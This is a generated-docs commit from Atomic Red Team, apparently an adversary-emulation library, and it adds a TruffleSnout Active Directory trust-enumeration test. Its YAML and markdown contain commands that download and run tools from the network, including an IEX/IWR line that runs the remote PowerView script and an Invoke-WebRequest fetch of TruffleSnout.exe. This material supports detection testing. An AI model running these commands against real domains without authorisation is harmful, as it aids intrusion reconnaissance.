Generated docs from job=generate-docs branch=master [ci skip]
This commit is contained in:
Atomic Red Team doc generator
@@ -1089,6 +1089,7 @@ discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs
|
||||
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
|
||||
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
|
||||
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
|
||||
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
|
||||
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
|
||||
|
||||
|
@@ -788,6 +788,7 @@ discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs
|
||||
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
|
||||
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
|
||||
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
|
||||
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
|
||||
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
|
||||
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
|
||||
|
||||
|
@@ -1828,6 +1828,7 @@
|
||||
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
|
||||
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
|
||||
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
|
||||
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
|
||||
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
|
||||
|
||||
@@ -1341,6 +1341,7 @@
|
||||
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
|
||||
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
|
||||
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
|
||||
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
|
||||
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
|
||||
|
||||
@@ -81682,6 +81682,39 @@ discovery:
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
|
||||
name: powershell
|
||||
- name: TruffleSnout - Listing AD Infrastructure
|
||||
auto_generated_guid: ea1b4f2d-5b82-4006-b64f-f2845608a3bf
|
||||
description: 'Iterative AD discovery toolkit for offensive operators. Situational
|
||||
awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
trufflesnout_path:
|
||||
description: Path to the TruffleSnout executable
|
||||
type: Path
|
||||
default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe
|
||||
domain:
|
||||
description: Domain name to search on
|
||||
type: String
|
||||
default: "%userdomain%"
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path #{trufflesnout_path}) {exit 0} else {exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
New-Item -ItemType Directory (Split-Path #{trufflesnout_path}) -Force | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile #{trufflesnout_path}
|
||||
executor:
|
||||
command: |
|
||||
#{trufflesnout_path} forest -n #{domain}
|
||||
#{trufflesnout_path} domain -n #{domain}
|
||||
name: command_prompt
|
||||
T1083:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -18,6 +18,8 @@
|
||||
|
||||
- [Atomic Test #7 - Get-ForestTrust with PowerView](#atomic-test-7---get-foresttrust-with-powerview)
|
||||
|
||||
- [Atomic Test #8 - TruffleSnout - Listing AD Infrastructure](#atomic-test-8---trufflesnout---listing-ad-infrastructure)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -293,4 +295,52 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - TruffleSnout - Listing AD Infrastructure
|
||||
Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** ea1b4f2d-5b82-4006-b64f-f2845608a3bf
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| trufflesnout_path | Path to the TruffleSnout executable | Path | PathToAtomicsFolder\T1482\src\TruffleSnout.exe|
|
||||
| domain | Domain name to search on | String | %userdomain%|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
#{trufflesnout_path} forest -n #{domain}
|
||||
#{trufflesnout_path} domain -n #{domain}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
if (Test-Path #{trufflesnout_path}) {exit 0} else {exit 1}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
New-Item -ItemType Directory (Split-Path #{trufflesnout_path}) -Force | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile #{trufflesnout_path}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user